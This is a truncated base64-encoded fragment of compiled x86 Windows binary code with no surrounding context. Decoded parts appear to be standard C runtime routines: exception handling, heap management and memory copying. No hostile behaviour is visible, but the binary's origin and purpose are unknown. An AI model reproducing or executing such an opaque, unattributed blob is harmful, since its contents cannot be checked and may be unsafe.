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//dkjopp3///92TOienf///3ZQ6Jad////dlTojp3///92WOiGnf///3Zc6H6d////dmDodp3///92ZOhunf///3Zo6Gad////dmzoXp3///92cOhWnf///3Z06E6d////dnjoRp3///92fOg+nf//g8RA/7aAAAAA6DCd////toQAAADoJZ3///+2iAAAAOganf///7aMAAAA6A+d////tpAAAADoBJ3///+2lAAAAOj5nP///7aYAAAA6O6c////tpwAAADo45z///+2oAAAAOjYnP///7akAAAA6M2c////tqgAAADowpz//4PELF5dw4v/VYvsVot1CIX2dDWLBjsFYFoBEHQHUOifnP//WYtGBDsFZFoBEHQHUOiNnP//WYt2CDs1aFoBEHQHVuh7nP//WV5dw4v/VYvsVot1CIX2dH6LRgw7BWxaARB0B1DoWZz//1mLRhA7BXBaARB0B1DoR5z//1mLRhQ7BXRaARB0B1DoNZz//1mLRhg7BXhaARB0B1DoI5z//1mLRhw7BXxaARB0B1DoEZz//1mLRiA7BYBaARB0B1Do/5v//1mLdiQ7NYRaARB0B1bo7Zv//1leXcOL/1WL7ItFCFMz21ZXO8N0B4t9DDv7dxvo4KH//2oWXokwU1NTU1PoaaH//4PEFIvG6zyLdRA783UEiBjr2ovQOBp0BEJPdfg7+3Tuig6ICkJGOst0A0918zv7dRCIGOiZof//aiJZiQiL8eu1M8BfXltdw8zMzMzMVYvsVjPAUFBQUFBQUFCLVQyNSQCKAgrAdAmDwgEPqwQk6/GLdQiDyf+NSQCDwQGKBgrAdAmDxgEPowQkc+6LwYPEIF7Jw4v/VYvsU1aLdQgz21c5XRR1EDvzdRA5XQx1EjPAX15bXcM783QHi30MO/t3G+gMof//ahZeiTBTU1NTU+iVoP//g8QUi8br1TldFHUEiB7ryotVEDvTdQSIHuvRg30U/4vGdQ+KCogIQEI6y3QeT3Xz6xmKCogIQEI6y3QIT3QF/00Ude45XRR1AogYO/t1i4N9FP91D4tFDGpQiFwG/1jpeP///4ge6JKg//9qIlmJCIvx64LMzMzMzFWL7FYzwFBQUFBQUFBQi1UMjUkAigIKwHQJg8IBD6sEJOvxi3UIi/+KBgrAdAyDxgEPowQkc/GNRv+DxCBeycOL/1WL7IPsEP91CI1N8OjRk///g30U/30EM8DrEv91GP91FP91EP91DP8VLAEBEIB9/AB0B4tN+INhcP3Jw4v/VYvsUVGLRQxWi3UIiUX4i0UQV1aJRfzoph4AAIPP/1k7x3UR6Nuf///HAAkAAACLx4vX60r/dRSNTfxR/3X4UP8VNAEBEIlF+DvHdRP/FRwAARCFwHQJUOjNn///WevPi8bB+AWLBIUgewEQg+YfweYGjUQwBIAg/YtF+ItV/F9eycNqFGhIMQEQ6MHc//+Dzv+JddyJdeCLRQiD+P51HOhyn///gyAA6Fef///HAAkAAACLxovW6dAAAAAz/zvHfAg7BQh7ARByIehIn///iTjoLp///8cACQAAAFdXV1dX6Lae//+DxBTryIvIwfkFjRyNIHsBEIvwg+YfweYGiwsPvkwxBIPhAXUm6Aef//+JOOjtnv//xwAJAAAAV1dXV1fodZ7//4PEFIPK/4vC61tQ6AIeAABZiX38iwP2RDAEAXQc/3UU/3UQ/3UM/3UI6Kn+//+DxBCJRdyJVeDrGuifnv//xwAJAAAA6Kee//+JOINN3P+DTeD/x0X8/v///+gMAAAAi0Xci1Xg6ATc///D/3UI6D8eAABZw4v/VYvsuOQaAADoJR8AAKEcUAEQM8WJRfyLRQxWM/aJhTTl//+JtTjl//+JtTDl//85dRB1BzPA6ekGAAA7xnUn6DWe//+JMOgbnv//VlZWVlbHABYAAADoo53//4PEFIPI/+m+BgAAU1eLfQiLx8H4BY00hSB7ARCLBoPnH8HnBgPHilgkAtvQ+4m1KOX//4idJ+X//4D7AnQFgPsBdTCLTRD30fbBAXUm6Myd//8z9okw6LCd//9WVlZWVscAFgAAAOg4nf//g8QU6UMGAAD2QAQgdBFqAmoAagD/dQjofv3//4PEEP91COhpBwAAWYXAD4SdAgAAiwb2RAcEgA+EkAIAAOiwr///i0BsM8k5SBSNhRzl//8PlMFQiwb/NAeJjSDl////FUABARCFwA+EYAIAADPJOY0g5f//dAiE2w+EUAIAAP8VPAEBEIudNOX//4mFHOX//zPAiYU85f//OUUQD4ZCBQAAiYVE5f//ioUn5f//hMAPhWcBAACKC4u1KOX//zPAgPkKD5TAiYUg5f//iwYDx4N4OAB0FYpQNIhV9IhN9YNgOABqAo1F9FDrSw++wVDoC5H//1mFwHQ6i4005f//K8sDTRAzwEA7yA+GpQEAAGoCjYVA5f//U1DokgsAAIPEDIP4/w+EsQQAAEP/hUTl///rG2oBU42FQOX//1DobgsAAIPEDIP4/w+EjQQAADPAUFBqBY1N9FFqAY2NQOX//1FQ/7Uc5f//Q/+FROX///8V3AABEIvwhfYPhFwEAABqAI2FPOX//1BWjUX0UIuFKOX//4sA/zQH/xU4AQEQhcAPhCkEAACLhUTl//+LjTDl//8DwTm1POX//4mFOOX//w+MFQQAAIO9IOX//wAPhM0AAABqAI2FPOX//1BqAY1F9FCLhSjl//+LAMZF9A3/NAf/FTgBARCFwA+E0AMAAIO9POX//wEPjM8DAAD/hTDl////hTjl///pgwAAADwBdAQ8AnUhD7czM8lmg/4KD5TBQ0ODhUTl//8CibVA5f//iY0g5f//PAF0BDwCdVL/tUDl///oQxsAAFlmO4VA5f//D4VoAwAAg4U45f//AoO9IOX//wB0KWoNWFCJhUDl///oFhsAAFlmO4VA5f//D4U7AwAA/4U45f///4Uw5f//i0UQOYVE5f//D4L5/f//6ScDAACLDooT/4U45f//iFQPNIsOiUQPOOkOAwAAM8mLBgPH9kAEgA+EvwIAAIuFNOX//4mNQOX//4TbD4XKAAAAiYU85f//OU0QD4YgAwAA6waLtSjl//+LjTzl//+DpUTl//8AK4005f//jYVI5f//O00QczmLlTzl////hTzl//+KEkGA+gp1EP+FMOX//8YADUD/hUTl//+IEED/hUTl//+BvUTl////EwAAcsKL2I2FSOX//yvYagCNhSzl//9QU42FSOX//1CLBv80B/8VOAEBEIXAD4RCAgAAi4Us5f//AYU45f//O8MPjDoCAACLhTzl//8rhTTl//87RRAPgkz////pIAIAAImFROX//4D7Ag+F0QAAADlNEA+GTQIAAOsGi7Uo5f//i41E5f//g6U85f//ACuNNOX//42FSOX//ztNEHNGi5VE5f//g4VE5f//Ag+3EkFBZoP6CnUWg4Uw5f//AmoNW2aJGEBAg4U85f//AoOFPOX//wJmiRBAQIG9POX///4TAABytYvYjYVI5f//K9hqAI2FLOX//1BTjYVI5f//UIsG/zQH/xU4AQEQhcAPhGIBAACLhSzl//8BhTjl//87ww+MWgEAAIuFROX//yuFNOX//ztFEA+CP////+lAAQAAOU0QD4Z8AQAAi41E5f//g6U85f//ACuNNOX//2oCjYVI+f//XjtNEHM8i5VE5f//D7cSAbVE5f//A85mg/oKdQ5qDVtmiRgDxgG1POX//wG1POX//2aJEAPGgb085f//qAYAAHK/M/ZWVmhVDQAAjY3w6///UY2NSPn//yvBmSvC0fhQi8FQVmjp/QAA/xXcAAEQi9g73g+ElwAAAGoAjYUs5f//UIvDK8ZQjYQ18Ov//1CLhSjl//+LAP80B/8VOAEBEIXAdAwDtSzl//873n/L6wz/FRwAARCJhUDl//873n9ci4VE5f//K4U05f//iYU45f//O0UQD4IK////6z9qAI2NLOX//1H/dRD/tTTl////MP8VOAEBEIXAdBWLhSzl//+DpUDl//8AiYU45f//6wz/FRwAARCJhUDl//+DvTjl//8AdWyDvUDl//8AdC1qBV45tUDl//91FOijl///xwAJAAAA6KuX//+JMOs//7VA5f//6K+X//9Z6zGLtSjl//+LBvZEBwRAdA+LhTTl//+AOBp1BDPA6yToY5f//8cAHAAAAOhrl///gyAAg8j/6wyLhTjl//8rhTDl//9fW4tN/DPNXui3iP//ycNqEGhoMQEQ6HXU//+LRQiD+P51G+gvl///gyAA6BSX///HAAkAAACDyP/pnQAAADP/O8d8CDsFCHsBEHIh6AaX//+JOOjslv//xwAJAAAAV1dXV1fodJb//4PEFOvJi8jB+QWNHI0gewEQi/CD5h/B5gaLCw++TDEEg+EBdL9Q6OYVAABZiX38iwP2RDAEAXQW/3UQ/3UM/3UI6C74//+DxAyJReTrFuiJlv//xwAJAAAA6JGW//+JOINN5P/HRfz+////6AkAAACLReTo9dP//8P/dQjoMBYAAFnDi/9Vi+z/BVBmARBoABAAAOggxv//WYtNCIlBCIXAdA2DSQwIx0EYABAAAOsRg0kMBI1BFIlBCMdBGAIAAACLQQiDYQQAiQFdw4v/VYvsi0UIg/j+dQ/o/pX//8cACQAAADPAXcNWM/Y7xnwIOwUIewEQchzo4JX//1ZWVlZWxwAJAAAA6GiV//+DxBQzwOsai8iD4B/B+QWLDI0gewEQweAGD75EAQSD4EBeXcO4oFoBEMOh4HoBEFZqFF6FwHUHuAACAADrBjvGfQeLxqPgegEQagRQ6KDF//9ZWaPcagEQhcB1HmoEVok14HoBEOiHxf//WVmj3GoBEIXAdQVqGlhewzPSuaBaARDrBaHcagEQiQwCg8Egg8IEgfkgXQEQfOpq/l4z0rmwWgEQV4vCwfgFiwSFIHsBEIv6g+cfwecGiwQHg/j/dAg7xnQEhcB1Aokxg8EgQoH5EFsBEHzOXzPAXsPoEBgAAIA9lGMBEAB0BejZFQAA/zXcagEQ6MOO//9Zw4v/VYvsVot1CLigWgEQO/ByIoH+AF0BEHcai84ryMH5BYPBEFHo/dX//4FODACAAABZ6wqDxiBW/xUEAQEQXl3Di/9Vi+yLRQiD+BR9FoPAEFDo0NX//4tFDIFIDACAAABZXcOLRQyDwCBQ/xUEAQEQXcOL/1WL7ItFCLmgWgEQO8FyHz0AXQEQdxiBYAz/f///K8HB+AWDwBBQ6K3U//9ZXcODwCBQ/xUAAQEQXcOL/1WL7ItNCIP5FItFD